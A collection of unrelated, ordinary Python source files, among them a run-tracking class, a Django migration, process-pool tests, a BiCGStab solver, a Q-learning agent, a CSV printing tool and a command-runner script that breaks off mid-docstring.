class Runs(object):
def __init__(self, minimum_run_duration, maximum_gap_between_runs):
self._minimum_run_duration = minimum_run_duration
self._maximum_gap_between_runs = maximum_gap_between_runs
self.runs = []
self._current_run = None
def copy(self):
copy = Runs(self._minimum_run_duration, self._maximum_gap_between_runs)
if self._current_run: copy._current_run = self._current_run.copy()
copy.runs = [run.copy() for run in self.runs]
return copy
def add_run(self, start, duration, peak):
# Extend or create a run
if self._current_run is None:
self._current_run = TimeRange(start, duration, peak)
else:
new_duration = (start - self._current_run.start) + duration
new_peak = max(self._current_run.peak, peak)
self._current_run.duration = new_duration
self._current_run.peak = new_peak
def add_gap(self, start, duration):
if self._current_run is not None:
# Are we still close enough to the end of the current run that we can overlook this gap?
if start - self._current_run.end < self._maximum_gap_between_runs:
return
self.end_current_run()
def end_current_run(self):
# A gap terminates the current run. If it's long enough, add it to the runs array
if self._current_run is not None and self._current_run.duration >= self._minimum_run_duration:
self.runs.append(self._current_run)
self._current_run = None
def time_range_intersects_a_run(self, time_range):
for run in self.runs:
if run.start > time_range.end:
# We've gone past all applicable ranges
return False
if time_range.intersects_range(run):
return True
return False
def time_is_in_a_run(self, time):
for run in self.runs:
if time >= run.start:
if time < run.end:
return True
return False
return False
def normalize(self):
# sorts runs based on start time and merges overlapping runs
def normalize_runs(runs):
if len(runs) <= 1: return runs
run = runs[0]
next_run = runs[1]
if run.intersects_range(next_run):
run.duration += next_run.duration
run.peak = max(run.peak, next_run.peak)
# todo: merge tags
return normalize_runs([run] + runs[2:])
return [run] + normalize_runs(runs[1:])
sorted_runs = sorted(self.runs, key=lambda r: r.start)
self.runs = normalize_runs(sorted_runs)
def pad_runs(self, pre_padding, post_padding, max_duration):
for run in self.runs:
run.start = max(0, run.start - pre_padding)
run.duration += pre_padding + post_padding
if run.end > max_duration:
run.duration = max_duration - run.start
self.normalize()
def to_dict(self):
d = { 'minimum_run_duration': self._minimum_run_duration,
'maximum_gap_between_runs': self._maximum_gap_between_runs,
'_current_run': None,
'runs': [r.to_dict() for r in self.runs] }
if self._current_run is not None:
d['_current_run'] = self._current_run.to_dict()
return d
@classmethod
def from_dict(cls, d):
runs = cls(d['minimum_run_duration'], d['maximum_gap_between_runs'])
if d['_current_run'] is not None:
runs._current_run = TimeRange.from_dict(d['_current_run'])
runs.runs = map(lambda rd: TimeRange.from_dict(rd), d['runs'])
return runs
def __repr__(self):
if len(self.runs) == 0: return '<Runs (empty)>'
runs_reprs = '\n '.join(map(repr, self.runs))
total_duration_s = sum([run.duration for run in self.runs]) / 1000.
duration_s = total_duration_s % 60
duration_m = int(total_duration_s / 60)
return '<Runs ({} runs; total duration {}:{:05.2f})>:\n {}'.format(len(self.runs), duration_m, duration_s, runs_reprs)
|
from AllNeo_Code.Helper.logger import NeoLogger as NL
Logger = NL.NeoLogger.getLogger("TestLog")
Logger.warning("Test Warning")
Logger.error("Test Error") |
from django.db import models, migrations
def update_last_modify_timestamp(apps, schema_editor):
Chat = apps.get_model('chat', 'Chat')
for chat in Chat.objects.all():
if not chat.last_modify_timestamp:
last_msg = chat.message_set.all().order_by('-timestamp').first()
if last_msg:
chat.last_modify_timestamp = last_msg.timestamp
chat.save()
class Migration(migrations.Migration):
dependencies = [
('chat', '0010_auto_20170613_0632'),
]
operations = [
migrations.RunPython(update_last_modify_timestamp, lambda apps, se: None),
]
|
import sys
s=0
e=int(sys.argv[3])
while s <= int(sys.argv[1]):
print(str(s) + " " + str(e))
s = e - int(sys.argv[2])
e = s + int(sys.argv[3])
|
import asyncio
import sys
import time
import weakref
from random import random
import pytest
try:
import cloudpickle # noqa: F401
skip_cloudpickle_test = False
except ImportError:
skip_cloudpickle_test = True
from hybrid_pool_executor.constants import ACT_EXCEPTION, ACT_RESTART
from hybrid_pool_executor.workers.process.worker import (
Action,
ProcessManager,
ProcessManagerSpec,
ProcessTask,
ProcessWorker,
ProcessWorkerSpec,
)
def simple_task():
return "done"
def simple_error_task():
raise RuntimeError("error")
def simple_task_v(v):
time.sleep(random())
return v
async def simple_async_task_v(v):
await asyncio.sleep(random())
return v
@pytest.mark.timeout(10)
def test_process_worker_task():
worker_spec = ProcessWorkerSpec(
name="TestProcessWorker",
idle_timeout=1,
max_err_count=1,
)
task = ProcessTask(name="simple_task", fn=simple_task)
worker_spec.task_bus.put(task)
worker = ProcessWorker(worker_spec)
worker.start()
response: Action = worker_spec.response_bus.get()
assert response.result == "done"
worker.stop()
assert not worker.is_alive()
assert not worker.is_idle()
ref = weakref.ref(worker)
del worker_spec, worker, task
assert ref() is None
@pytest.mark.timeout(10)
def test_processs_worker_async_task():
worker_spec = ProcessWorkerSpec(
name="TestThreadWorker",
max_task_count=3,
idle_timeout=1,
max_err_count=1,
)
tasks = []
for i in range(3):
task = ProcessTask(name="simple_async_task", fn=simple_async_task_v, args=[i])
tasks.append(task)
worker_spec.task_bus.put(task)
worker = ProcessWorker(worker_spec)
worker.start()
for i in range(3):
response: Action = worker_spec.response_bus.get()
assert response.result == i
worker.stop()
assert not worker.is_alive()
assert not worker.is_idle()
ref = weakref.ref(worker)
del worker_spec, worker, task
assert ref() is None
@pytest.mark.timeout(10)
def test_process_worker_error():
worker_spec = ProcessWorkerSpec(
name="TestProcessWorker",
idle_timeout=1,
max_err_count=1,
)
task = ProcessTask(name="simple_error_task", fn=simple_error_task)
worker_spec.task_bus.put(task)
worker = ProcessWorker(worker_spec)
worker.start()
response: Action = worker_spec.response_bus.get()
assert isinstance(response.exception, RuntimeError)
assert response.match(ACT_EXCEPTION)
assert response.match(ACT_RESTART)
worker.stop()
assert not worker.is_alive()
assert not worker.is_idle()
@pytest.mark.timeout(10)
def test_process_manager():
manager_spec = ProcessManagerSpec()
manager = ProcessManager(manager_spec)
manager.start()
future = manager.submit(simple_task)
assert future.result() == "done"
manager.stop()
@pytest.mark.timeout(20 if sys.platform == "linux" else 60)
@pytest.mark.asyncio
async def test_process_manager_high_concurrency():
with ProcessManager(ProcessManagerSpec()) as manager:
futures = []
for i in range(32):
futures.append(manager.submit(simple_task_v, (i,)))
for i, future in enumerate(futures):
assert await future == i
@pytest.mark.skipif(skip_cloudpickle_test, reason="cloudpickle is not installed")
@pytest.mark.timeout(10)
def test_cloudpickle_process_manager():
def clousure_task():
return "done"
async def async_clousure_task():
return "done"
lambda_task = lambda x: x # noqa: E731
manager_spec = ProcessManagerSpec()
manager = ProcessManager(manager_spec)
manager.start()
future = manager.submit(clousure_task)
assert future.result() == "done"
future = manager.submit(async_clousure_task)
assert future.result() == "done"
future = manager.submit(lambda_task, args=("done",))
assert future.result() == "done"
manager.stop()
|
##############################################################################################################################################################
##############################################################################################################################################################
"""
Repeat training of classification model for different seeds.
Replace or modify the config file in the following part of the code to make changes to train different models.
# load the config file
config = toml.load("cfg/pretrained_classifier.toml")
"""
#####################################################################################################################################################
#####################################################################################################################################################
import toml
import torch
import random
import numpy as np
from train_classifier import train
#####################################################################################################################################################
#####################################################################################################################################################
if __name__ == '__main__':
# load the config file
config = toml.load("cfg/pretrained_classifier.toml")
# define some fair seeds
seeds = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
# for each seed defined above
for seed in seeds:
print("-"*77)
print("Running experiment for seed: ", seed)
print("-"*77)
# reproducibility
# set the seed to the current seed
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
np.random.seed(seed)
random.seed(seed)
# run the training
train(config)
##################################################################################################################################################### |
import numpy as np
import numpy.typing as npt
import iterations_lib.python_inspectors_diag.utils as utils
from typing import Tuple
def BiCGStab_solver(complex_matrix: np.ndarray,
f_vector: np.ndarray,
u0_vector: np.ndarray = None,
eps: float = 10e-7,
n_iter: int = 10000) -> Tuple[np.ndarray, np.ndarray, np.ndarray,
np.ndarray, np.ndarray, np.ndarray,
np.ndarray, np.ndarray, np.ndarray,
np.ndarray, np.ndarray]:
"""
Van der Vorst, Henk. (2003). Iterative Krylov Methods for Large Linear Systems. 13. 10.1017/CBO9780511615115.
:param complex_matrix:
:param f_vector:
:param u0_vector:
:param eps:
:param n_iter:
:return:
"""
# Инициализация начальной переменной
if u0_vector is None:
u0_vector = np.ones(f_vector.shape[0], dtype=complex)
# Формирование матрицы истории итераций
u_vector = np.zeros((1, len(u0_vector)), dtype=complex)
u_vector[0] = u0_vector.copy()
# Явное указание комплексности матрицы
complex_matrix = np.array(complex_matrix, dtype=complex)
f_vector = np.array(f_vector, dtype=complex)
r = np.zeros((1, complex_matrix.shape[0]), dtype=complex)
r[0] = f_vector - utils.matrix_diag_prod(complex_matrix, u_vector[0])
r_tild = np.zeros((complex_matrix.shape[0], ), dtype=complex)
r_tild = r[0].copy()
v = np.zeros((1, complex_matrix.shape[0]), dtype=complex)
p = np.zeros((1, complex_matrix.shape[0]), dtype=complex)
s = np.zeros((1, complex_matrix.shape[0]), dtype=complex)
t = np.zeros((1, complex_matrix.shape[0]), dtype=complex)
beta = np.zeros((1, ), dtype=float)
rho = np.ones((1, ), dtype=float)
alpha = np.ones((1,), dtype=float)
omega = np.ones((1,), dtype=float)
iter_space = np.zeros((1, ), dtype=int)
iter_space[0] = 1
for iter_index in range(1, n_iter):
new_rho = utils.vec_dot_complex_prod_bicg(r_tild, r[iter_index - 1])
rho = np.concatenate((rho, new_rho.reshape((1, ))), axis=0)
new_beta = (rho[iter_index] / rho[iter_index - 1]) * (alpha[iter_index - 1] / omega[iter_index - 1])
beta = np.concatenate((beta, new_beta.reshape((1, ))), axis=0)
new_p = r[iter_index - 1] + beta[iter_index] * (rho[iter_index - 1] - omega[iter_index - 1] * v[iter_index - 1])
p = np.concatenate((p, new_p.reshape((1, -1))), axis=0)
new_v = utils.matrix_diag_prod(complex_matrix, p[iter_index])
v = np.concatenate((v, new_v.reshape((1, -1))), axis=0)
new_alpha = rho[iter_index] / utils.vec_dot_complex_prod_bicg(r_tild, v[iter_index])
alpha = np.concatenate((alpha, new_alpha.reshape((1, ))), axis=0)
new_s = r[iter_index - 1] - alpha[iter_index] * v[iter_index]
s = np.concatenate((s, new_s.reshape((1, -1))), axis=0)
new_t = utils.matrix_diag_prod(complex_matrix, s[iter_index])
t = np.concatenate((t, new_t.reshape((1, -1))), axis=0)
new_omega = utils.vec_dot_real_prod(t[iter_index], s[iter_index]) / \
utils.vec_dot_real_prod(t[iter_index], t[iter_index])
omega = np.concatenate((omega, new_omega.reshape((1, ))), axis=0)
new_u = u_vector[iter_index - 1] + omega[iter_index] * s[iter_index] + alpha[iter_index] * p[iter_index]
u_vector = np.concatenate((u_vector, new_u.reshape((1, -1))), axis=0)
new_r = s[iter_index] - omega[iter_index] * t[iter_index]
r = np.concatenate((r, new_r.reshape((1, -1))), axis=0)
iter_space = np.concatenate((iter_space, np.array(iter_space[iter_index - 1] + 2).reshape((1,))), axis=0)
difference = utils.l2_norm(u_vector[iter_index] - u_vector[iter_index - 1]) / utils.l2_norm(f_vector)
if difference < eps:
break
return u_vector, iter_space, r, v, p, s, t, alpha, beta, omega, rho
def _main():
A_matrix = np.array((0.5, 1, 1.5, 2, 2.5))
f_vector = np.array((1, 2, 3, 4, 5))
solve, it_space = BiCGStab_solver(A_matrix, f_vector)[:2]
real_solve = f_vector / A_matrix
print("Real_Solve")
print(real_solve)
print("\nIterations Solve")
print(solve[-1])
print("\nIterations Space")
print(it_space)
return 0
if __name__ == "__main__":
_main()
|
# -*- coding: utf-8 -*-
# Copyright 2018 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from asyncio.subprocess import PIPE
import asyncio
import logging
async def run(cmd, timeout=None):
try:
proc = await asyncio.create_subprocess_shell(
cmd, stdout=PIPE, stderr=PIPE)
out, err = await asyncio.wait_for(proc.communicate(), timeout)
except asyncio.TimeoutError as e:
logging.info(f'command timed out: timeout={timeout} cmd={cmd}')
proc.terminate()
raise e
out = out.decode('ascii').rstrip()
err = err.decode('ascii').rstrip()
logging.debug('stdout: ' + out)
logging.debug('stderr: ' + err)
if proc.returncode != 0:
ret = proc.returncode
raise Exception(f'command returned {ret}: err={err} cmd={cmd}')
return out, err
|
"""A poor substitute for PHP's strtotime function."""
# =============================================================================
# CONTENTS
# -----------------------------------------------------------------------------
# phlsys_strtotime
#
# Public Functions:
# describe_duration_string_to_time_delta
# duration_string_to_time_delta
#
# -----------------------------------------------------------------------------
# (this contents block is generated, edits will be lost)
# =============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
def describe_duration_string_to_time_delta():
return str('time can be specified like "5 hours 20 minutes", use '
'combinations of seconds, minutes, hours, days, weeks. '
'each unit should only appear once. you may use floating '
'point numbers and negative numbers. '
'e.g. "1 weeks -1.5 days".')
def duration_string_to_time_delta(s):
"""Return a datetime.timedelta based on the supplied string 's'.
Usage examples:
>>> str(duration_string_to_time_delta("1 seconds"))
'0:00:01'
>>> str(duration_string_to_time_delta("2 minutes"))
'0:02:00'
>>> str(duration_string_to_time_delta("2 hours 2 minutes"))
'2:02:00'
>>> str(duration_string_to_time_delta("1 days 2 hours 2 minutes"))
'1 day, 2:02:00'
>>> str(duration_string_to_time_delta("1.5 days"))
'1 day, 12:00:00'
>>> str(duration_string_to_time_delta("1 days -1 hours"))
'23:00:00'
>>> str(duration_string_to_time_delta("1 milliseconds"))
'0:00:00.001000'
:s: a string in the appropriate time format
:returns: a datetime.timedelta
"""
clauses = s.split()
if len(clauses) % 2:
raise ValueError("odd number of clauses: " + s)
pairs = zip(clauses[::2], clauses[1::2])
d = {p[1]: float(p[0]) for p in pairs}
if len(d) != len(pairs):
raise ValueError("duplicated clauses: " + s)
return datetime.timedelta(**d)
# -----------------------------------------------------------------------------
# Copyright (C) 2013-2014 Bloomberg Finance L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------ END-OF-FILE ----------------------------------
|
from typing import List
from ..Agent import Agent
import numpy as np
class QLearning(Agent):
def __init__(self, actions: List, alpha: float, gamma: float, eps: float):
super().__init__()
self.actions = actions
self.alpha = alpha
self.gamma = gamma
self.eps = eps
self.q = {}
self.prev_state = None
self.prev_action = None
def _action_value(self, state, action):
""" Compute state-action value of this pair."""
return self.q.get((state, action), 1e-2*np.random.randn())
def _get_action(self, state, eps):
""" Return an eps-greedy action to be taken from this state. """
if np.random.rand() < eps:
return np.random.choice(self.actions)
action = max(self.actions, key=lambda action: self._action_value(
state=state, action=action))
return action
def update(self, state, reward):
""" Update state-action value of previous (state, action).
Args:
state (Any): The new state representation.
reward (float): Reward received upon the transaction to `state`.
Note:
- The parameter ``state`` should be an immutable type since it's used as a key.
"""
state = self.decode_state(state)
q = self._action_value(state=self.prev_state, action=self.prev_action)
tmp = reward - q
tmp += self.gamma * \
self._action_value(state, self._get_action(state, 0))
self.q[(self.prev_state, self.prev_action)] = q + self.alpha * tmp
def take_action(self, state):
""" Choose an eps-greedy action to be taken from this state.
Args:
state (Any): The current state representation. It should be an immutable type since it's used as a key.
"""
state = self.decode_state(state)
action = self._get_action(state, self.eps)
self.prev_action = action
self.prev_state = state
return action
def save(self, path: str):
""" Save state-action value table in `path`.npy
Args:
path (str): The location of where to store the state-action value table.
"""
super().save(path)
np.save(path + '.npy', self.q)
def load(self, path):
""" Load state-action value table.
If it doesn't exist, a randomly-initialized table is used.
Args:
path (str): The location of where the state-action value table resides.
"""
try:
self.q = np.load(path + '.npy', allow_pickle='TRUE').item()
except:
self.q = {}
print("No file is found in:", path)
|
## Copyright (c) 2016 Upstream Research, Inc. All Rights Reserved. ##
## Subject to an 'MIT' License. See LICENSE file in top-level directory ##
help_text = (
"CSV-PRINT tool version 20170220:20170605\n"
"Prints a fixed-width representation of a CSV file\n"
"\n"
"csv-print [OPTIONS] [InputFile]\n"
"\n"
"OPTIONS\n"
" -H Don't skip the header row when analyzing column width\n"
" -K {N} Number of input rows to skip (not including header)\n"
" -N {N} Number of input rows to analyze for column widths (default=1)\n"
" -n {N} Number of rows to print (default=all)\n"
" -o {F} Output file name\n"
" --min-width {N} Minimum column width (default=1)\n"
" --max-width {N} Maximum column width (default=unbounded)\n"
" --widths Comma-separated list of column widths\n"
"\n"
)
import sys
import csv
import io
from ._csv_helpers import (
decode_delimiter_name
,decode_charset_name
,decode_newline
)
def main(arg_list, stdin, stdout, stderr):
in_io = stdin
out_io = stdout
err_io = stderr
show_help = False
input_file_name = None
output_file_name = None
input_delimiter = ','
output_delimiter = ' '
# 'std' will be translated to the standard line break decided by csv_helpers.decode_newline
input_row_terminator = 'std'
output_row_terminator = 'std'
input_charset_name = 'utf_8_sig'
output_charset_name = 'utf_8'
csv_cell_width_limit = 4*1024*1024 # python default is 131072 = 0x00020000
input_row_start_offset = 0
column_name_list_string = None
column_width_list_string = None
analyze_row_count_string = None
out_row_count_max_string = None
column_width_min_string = None
column_width_max_string = None
analyze_row_count = 1
out_row_count_max = None
column_width_min = 1
column_width_max = None
truncation_symbol = "-"
should_analyze_header_row = False
# [20160916 [db] I avoided using argparse in order to retain some flexibility for command syntax]
arg_count = len(arg_list)
arg_index = 1
while (arg_index < arg_count):
arg = arg_list[arg_index]
if (arg == "--help"
or arg == "-?"
):
show_help = True
elif (arg == "-o"
or arg == "--output"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
output_file_name = arg
elif (arg == "-E"
or arg == "--charset-in"
or arg == "--encoding-in"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
input_charset_name = arg
elif (arg == "-e"
or arg == "--charset-out"
or arg == "--encoding-out"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
output_charset_name = arg
elif (arg == "-S"
or arg == "--separator-in"
or arg == "--delimiter-in"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
input_delimiter = arg
elif (arg == "-s"
or arg == "--separator-out"
or arg == "--delimiter-out"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
output_delimiter = arg
elif (arg == "-W"
or arg == "--terminator-in"
or arg == "--newline-in"
or arg == "--endline-in"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
input_row_terminator = arg
elif (arg == "-w"
or arg == "--terminator-out"
or arg == "--newline-out"
or arg == "--endline-out"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
output_row_terminator = arg
elif (arg == "--cell-width-limit"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
csv_cell_width_limit = int(arg)
elif (arg == "-K"
or arg == "--row-offset-in"
or arg == "--offset"
or arg == "--skip"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
input_row_start_offset = int(arg)
elif (arg == "-N"
or arg == "--analyze-row-count"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
analyze_row_count_string = arg
elif (arg == "-n"
or arg == "--out-row-count-max"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
out_row_count_max_string = arg
elif (arg == "--min-width"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
column_width_min_string = arg
elif (arg == "--max-width"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
column_width_max_string = arg
elif (arg == "--select"
or arg == "--select-columns"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
column_name_list_string = arg
elif (arg == "--column-widths"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
column_width_list_string = arg
elif (arg == "--truncation-symbol"
):
if (arg_index < arg_count):
arg_index += 1
arg = arg_list[arg_index]
truncation_symbol = arg
elif (arg == "-H"
or arg == "--analyze-header"
):
should_analyze_header_row = True
elif (None != arg
and 0 < len(arg)
):
if (None == input_file_name):
input_file_name = arg
arg_index += 1
if (show_help):
out_io.write(help_text)
else:
# set global CSV column width
if (None != csv_cell_width_limit):
csv.field_size_limit(csv_cell_width_limit)
input_charset_name = decode_charset_name(input_charset_name)
output_charset_name = decode_charset_name(output_charset_name)
input_row_terminator = decode_newline(input_row_terminator)
output_row_terminator = decode_newline(output_row_terminator)
input_delimiter = decode_delimiter_name(input_delimiter)
output_delimiter = decode_delimiter_name(output_delimiter)
in_file = None
out_file = None
try:
if (None != out_row_count_max_string):
if ("all" == out_row_count_max_string.lower()):
out_row_count_max = None
else:
out_row_count_max = int(out_row_count_max_string)
if (None != analyze_row_count_string):
if ("all" == analyze_row_count_string.lower()):
analyze_row_count = None
else:
analyze_row_count = int(analyze_row_count_string)
# ensure the number of rows to analyze is not greater
# than the number of rows to output
if (None != out_row_count_max
and (None == analyze_row_count
or out_row_count_max < analyze_row_count
)
):
analyze_row_count = out_row_count_max
if (None != column_width_min_string):
column_width_min = int(column_width_min_string)
if (None != column_width_max_string):
if ("unbounded" == column_width_max_string.lower()
or "infinite" == column_width_max_string.lower()
or "inf" == column_width_max_string.lower()
):
column_width_max = None
else:
column_width_max = int(column_width_max_string)
column_name_list = None
if (None != column_name_list_string):
column_name_list = column_name_list_string.split(",")
column_width_list = None
if (None != column_width_list_string):
column_width_list = []
column_width_string_list = column_width_list_string.split(",")
for column_width_string in column_width_string_list:
column_width = None
if (0 < len(column_width_string)):
column_width = int(column_width_string)
column_width_list.append(column_width)
if (None != input_file_name):
read_text_io_mode = 'rt'
#in_newline_mode = '' # don't translate newline chars
in_newline_mode = input_row_terminator
in_file = io.open(input_file_name, mode=read_text_io_mode, encoding=input_charset_name, newline=in_newline_mode)
in_io = in_file
if (None != output_file_name):
write_text_io_mode = 'wt'
out_newline_mode='' # don't translate newline chars
out_file = io.open(output_file_name, mode=write_text_io_mode, encoding=output_charset_name, newline=out_newline_mode)
out_io = out_file
in_csv = csv.reader(in_io, delimiter=input_delimiter, lineterminator=input_row_terminator)
execute(
in_csv
,out_io
,output_delimiter
,output_row_terminator
,truncation_symbol
,column_name_list
,column_width_list
,input_row_start_offset
,analyze_row_count
,out_row_count_max
,column_width_min
,column_width_max
,should_analyze_header_row
)
except BrokenPipeError:
pass
finally:
if (None != in_file):
in_file.close()
if (None != out_file):
out_file.close()
def execute(
in_csv
,out_io
,output_delimiter
,output_row_terminator
,truncation_symbol
,column_name_list
,column_width_fixed_list
,skip_row_count
,analyze_row_count
,out_row_count_max
,column_width_min
,column_width_max
,should_analyze_header_row
):
end_row = None
newline = '\n'
in_header_row = next(in_csv, end_row)
out_header_row = None
if (end_row != in_header_row):
# [20170220 [db] This code for finding the column offsets comes from
# the csv-select tool, i thought it would be helpful to incorporate it here
# although i think it violates the "do one thing and do it well" rule]
# default to inclusion of all input columns in the output
if (None == column_name_list):
column_name_list = list(in_header_row)
# make a list of column offsets, and fixup the column names
out_header_row = []
column_position_map = []
out_column_position = 0
while (out_column_position < len(column_name_list)):
out_column_name = column_name_list[out_column_position]
out_column_name = out_column_name.strip()
out_column_name_norm = out_column_name.lower()
in_column_position = 0
found_column_position = None
while (in_column_position < len(in_header_row)
and None == found_column_position
):
in_column_name = in_header_row[in_column_position]
in_column_name_norm = in_column_name.strip().lower()
if (in_column_name_norm == out_column_name_norm):
found_column_position = in_column_position
in_column_position += 1
column_position_map.append(found_column_position)
out_header_row.append(out_column_name)
out_column_position += 1
# skip rows if necessary
in_row_count = 0
in_row = in_header_row
while (in_row_count < skip_row_count
and end_row != in_row
):
in_row_count += 1
in_row = next(in_csv, end_row)
# figure out the row widths
column_width_list = []
row_count = 0
in_row_list = []
if (not should_analyze_header_row):
# if we are not going to analyze the header row,
# then add it to our row list buffer now so it will get printed later.
in_row_list.append(in_header_row)
if (None == analyze_row_count
or 0 < analyze_row_count
):
if (should_analyze_header_row):
in_row = in_header_row
else:
in_row = next(in_csv, end_row)
while (end_row != in_row
and (None == analyze_row_count
or row_count < analyze_row_count
)
):
in_column_position = 0
while (in_column_position < len(in_row)):
cell_value = in_row[in_column_position]
cell_width = 0
if (None != cell_value):
# we need to check for newlines, the cell_width is the longest line
cell_value = normalize_newlines(cell_value)
cell_line_list = cell_value.split(newline)
cell_line_length_list = map(len, cell_line_list)
cell_width = max(cell_line_length_list)
#cell_width = len(cell_value)
if (in_column_position == len(column_width_list)):
column_width_list.append(column_width_min)
column_width = column_width_list[in_column_position]
column_width_fixed = None
if (None != column_width_fixed_list
and in_column_position < len(column_width_fixed_list)
):
column_width_fixed = column_width_fixed_list[in_column_position]
if (None != column_width_fixed):
column_width = column_width_fixed
elif (column_width < cell_width):
if (column_width_max != None
and column_width_max < cell_width
):
column_width = column_width_max
else:
column_width = cell_width
column_width_list[in_column_position] = column_width
in_column_position += 1
in_row_list.append(in_row)
row_count += 1
if ((None == analyze_row_count
or row_count < analyze_row_count
)):
in_row = next(in_csv, end_row)
# write the rows
row_count = 0
row_list_position = 0
if (row_list_position < len(in_row_list)):
in_row = in_row_list[row_list_position]
row_list_position += 1
else:
in_row = next(in_csv, end_row)
while (end_row != in_row
and (None == out_row_count_max or row_count < out_row_count_max)
):
has_wrapped_cell = False
wrap_row = []
out_row = []
out_column_position = 0
while (out_column_position < len(column_position_map)):
in_column_position = column_position_map[out_column_position]
cell_value = None
if (None != in_column_position
and in_column_position < len(in_row)
):
cell_value = in_row[in_column_position]
column_width = None
if (None != in_column_position
and in_column_position < len(column_width_list)
):
column_width = column_width_list[in_column_position]
if (None == column_width):
column_width = column_width_min
out_cell_value = cell_value
if (None == out_cell_value):
out_cell_value = ""
out_cell_value = normalize_newlines(out_cell_value)
(out_cell_value, wrap_cell_value) = split_head_str(out_cell_value, newline)
wrap_row.append(wrap_cell_value)
if (None != wrap_cell_value):
has_wrapped_cell = True
if (column_width < len(out_cell_value)):
if (0 < column_width):
if (None == truncation_symbol):
out_cell_value = out_cell_value[0:column_width]
elif (len(truncation_symbol) <= column_width):
out_cell_value = out_cell_value[0:column_width-len(truncation_symbol)]
out_cell_value += truncation_symbol
elif (len(truncation_symbol) > column_width):
out_cell_value = truncation_symbol[0:column_width]
else:
out_cell_value = ""
elif (column_width > len(out_cell_value)):
out_cell_value = out_cell_value.ljust(column_width)
out_row.append(out_cell_value)
out_column_position += 1
out_line = output_delimiter.join(out_row) + output_row_terminator
out_io.write(out_line)
# if some cell values have newlines in them,
# then we must write another wrapped line of text
# this does not count as a "row" of output
if (has_wrapped_cell):
in_row = wrap_row
elif (row_list_position < len(in_row_list)):
row_count += 1
in_row = in_row_list[row_list_position]
row_list_position += 1
else:
row_count += 1
in_row = next(in_csv, end_row)
# ensure all newline symbols are normalized to be line-feed only
def normalize_newlines(in_str):
out_str = in_str
if (None != out_str):
out_str = out_str.replace('\r\n', '\n').replace('\r', '\n')
return out_str
# split a string at the first separator found
# and return a pair/tuple of the head and the tail
def split_head_str(in_str, sep):
head_str = None
tail_str = None
if (None != in_str and None != sep):
pos = in_str.find(sep)
if (0 > pos):
head_str = in_str
else:
head_str = in_str[0:pos]
tail_str = in_str[pos+len(sep):]
return (head_str, tail_str)
def console_main():
main(sys.argv, sys.stdin, sys.stdout, sys.stderr)
if __name__ == "__main__":
console_main()
|
#!/usr/bin/python
from __future__ import print_function
#from subprocess import Popen, PIPE
from subprocess import check_output, CalledProcessError, STDOUT
from datetime import datetime
import json
import logging
import pdb
import os
import shlex
import sys
import argparse
def parseargs():
parser = argparse.ArgumentParser()
parser.add_argument("-c","--configfile", help="name of config json", required=True, action = 'store')
parser.add_argument("-l","--logfile", help="name of log file", action = 'store', default = 'check_and_act.log')
#parser.add_argument("-e","--execute", help="use to make changes; otherwise read-only", action = 'store_true')
parser.add_argument("-m","--mode", help="mode - either cmds or events", action = 'store', default = 'cmds.log')
#action = 'store' is default (and can even be omitted)
#action = 'store_true' or 'store_false' are for flags:
# if user specifes --execute, then args.execute will evaulate to True; otherwise False
args = parser.parse_args()
return args
# define logging details
level = logging.INFO
level = logging.DEBUG
if os.environ.get('SSH_TTY') or 'xterm' in os.environ.get('TERM'):
handlers = [
logging.FileHandler(sys.argv[0] + '.log'),
logging.StreamHandler(),
]
else:
handlers = [logging.FileHandler(sys.argv[0] + '.log')]
logging.basicConfig(
level=level,
format='%(asctime)s [%(name)s][%(levelname)s] %(message)s',
handlers=handlers,
)
def run_cmd(cmd, return_output=False):
logging.debug('cmd is: {0}'.format(cmd))
#logging.debug('returnstring is: {0}'.format(returnstring))
cmdplus = shlex.split(cmd)
try:
if ';' in cmd or '|' in cmd:
ret = check_output(cmd, universal_newlines=True, stderr=STDOUT, shell=True).strip()
else:
ret = check_output(cmdplus, universal_newlines=True, stderr=STDOUT).strip()
#process = Popen(cmdplus, stdout=PIPE)
#cmdoutput = process.communicate()
except CalledProcessError as err:
logging.debug(f'"{cmd}" FAILED')
ret_code = err.returncode
return ((err.returncode, err.stdout) if hasattr(err, 'stdout') else (err.returncode, "cmd had no output"))
except FileNotFoundError as err:
return ((2, err.strerror) if hasattr(err, 'strerror') else (1, 'no sterror provided'))
except OSError as err:
#logging.error('OS Exception occurred: {}'.format(err))
return (2, 'OSError occurred')
logging.debug(f'cmd output is: {ret}')
return (0, ret) if return_output else (0, '')
'''
exitcode = process.wait()
